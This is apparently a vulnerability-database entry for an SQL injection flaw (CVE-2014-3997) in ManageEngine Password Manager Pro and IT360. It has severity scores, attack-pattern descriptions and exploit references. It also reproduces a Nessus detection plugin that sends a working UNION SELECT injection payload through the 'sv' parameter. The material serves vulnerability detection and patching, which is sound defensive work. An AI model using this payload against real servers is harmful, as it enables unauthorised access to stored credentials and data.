Vulnerabilities > CVE-2014-3997 - SQL Injection vulnerability in Zohocorp products

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
zohocorp
CWE-89
nessus
exploit available

Summary

SQL injection vulnerability in the MetadataServlet servlet in ManageEngine Password Manager Pro (PMP) and Password Manager Pro Managed Service Providers (MSP) edition 5 through 7 build 7003, IT360 and IT360 Managed Service Providers (MSP) edition before 10.3.3 build 10330, and possibly other ManageEngine products, allows remote attackers or remote authenticated users to execute arbitrary SQL commands via the sv parameter to MetadataServlet.dat.

Vulnerable Configurations

Part Description Count
Application
Zohocorp
99

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
  • Object Relational Mapping Injection
    An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.
  • SQL Injection through SOAP Parameter Tampering
    An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.
  • Expanding Control over the Operating System from the Database
    An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.
  • SQL Injection
    This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. In order to successfully inject SQL and retrieve information from a database, an attacker:

Exploit-Db

descriptionManageEngine Password Manager Pro and ManageEngine IT360 SQL Injection Vulnerability. CVE-2014-3997. Webapps exploits for multiple platform
idEDB-ID:39288
last seen2016-02-04
modified2014-08-20
published2014-08-20
reporterPedro Ribeiro
sourcehttps://www.exploit-db.com/download/39288/
titleManageEngine Password Manager Pro and ManageEngine IT360 SQL Injection Vulnerability

Nessus

NASL familyCGI abuses
NASL idMANAGEENGINE_PMP_SV_PARAM_SQLI.NASL
descriptionThe remote host is running a version of ManageEngine Password Manager Pro prior to 7.0 Build 7003. It is, therefore, affected by a SQL injection vulnerability due to a failure to validate the
last seen2020-06-01
modified2020-06-02
plugin id80962
published2015-01-23
reporterThis script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/80962
titleManageEngine Password Manager Pro < 7.0 Build 7003 SQL Injection
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(80962);
  script_version("1.7");
  script_cvs_date("Date: 2018/11/28 22:47:41");

  script_cve_id("CVE-2014-3996", "CVE-2014-3997");
  script_bugtraq_id(69303, 69305);

  script_name(english:"ManageEngine Password Manager Pro < 7.0 Build 7003 SQL Injection");
  script_summary(english:"Checks the version of ManageEngine Password Manager Pro.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a web application affected by a SQL
injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of ManageEngine Password Manager
Pro prior to 7.0 Build 7003. It is, therefore, affected by a SQL
injection vulnerability due to a failure to validate the 'sv'
parameter. A remote attacker can leverage this flaw to manipulate or
disclose arbitrary data.");
  # https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ManageEngine/me_dc_pmp_it360_sqli.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?20e5f236");
  # http://www.manageengine.com/products/passwordmanagerpro/release-notes.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6b35a1c6");
  script_set_attribute(attribute:"solution", value:
"Upgrade to ManageEngine Password Manager Pro version 7.0 build 7003 or
later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/08/19");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/06/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/01/23");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:manageengine:password_manager_pro");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("manageengine_pmp_detect.nbin");
  script_require_keys("installed_sw/ManageEngine Password Manager Pro");
  script_require_ports("Services/www", 7272);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("install_func.inc");
include("http.inc");
include("url_func.inc");

appname = "ManageEngine Password Manager Pro";
# Stops get_http_port from branching
get_install_count(app_name:appname, exit_if_zero:TRUE);

port    = get_http_port(default:7272);
install = get_single_install(app_name:appname,port:port); # Can be launched against unknown version
version = install['version'];
build   = install['build'  ];
url     = build_url(port:port,qs:install['path']);
sign    = rand_str(length:8);
# This should work against both backends: MySQL/PostgreSQL
attack  = urlencode(str:'" UNION ALL SELECT MD5(\''+sign+'\') FROM AaaLogin WHERE "1"="1" OR "a"="a');
md5sum  = hexstr(MD5(sign));

# For not affected reporting
if(version != UNKNOWN_VER)
  version = version+" (at least Build "+build+")";

res = http_send_recv3(
  method       : "GET",
  item         : "/LinkViewFetchServlet.dat?sv="+attack,
  port         : port,
  exit_on_fail : TRUE
);

if (md5sum >< res[2])
{
  security_report_v4(
    port     : port,
    sqli     : TRUE,
    request  : make_list(chomp(http_last_sent_request())),
    output   : res[2],
    severity : SECURITY_HOLE,
    generic  : TRUE
  );
  exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/127942/medcpmpit360-sql.txt
idPACKETSTORM:127942
last seen2016-12-05
published2014-08-20
reporterPedro Ribeiro
sourcehttps://packetstormsecurity.com/files/127942/ManageEngine-Desktop-Central-Password-Manager-Pro-IT360-SQL-Injection.html
titleManageEngine Desktop Central / Password Manager Pro / IT360 SQL Injection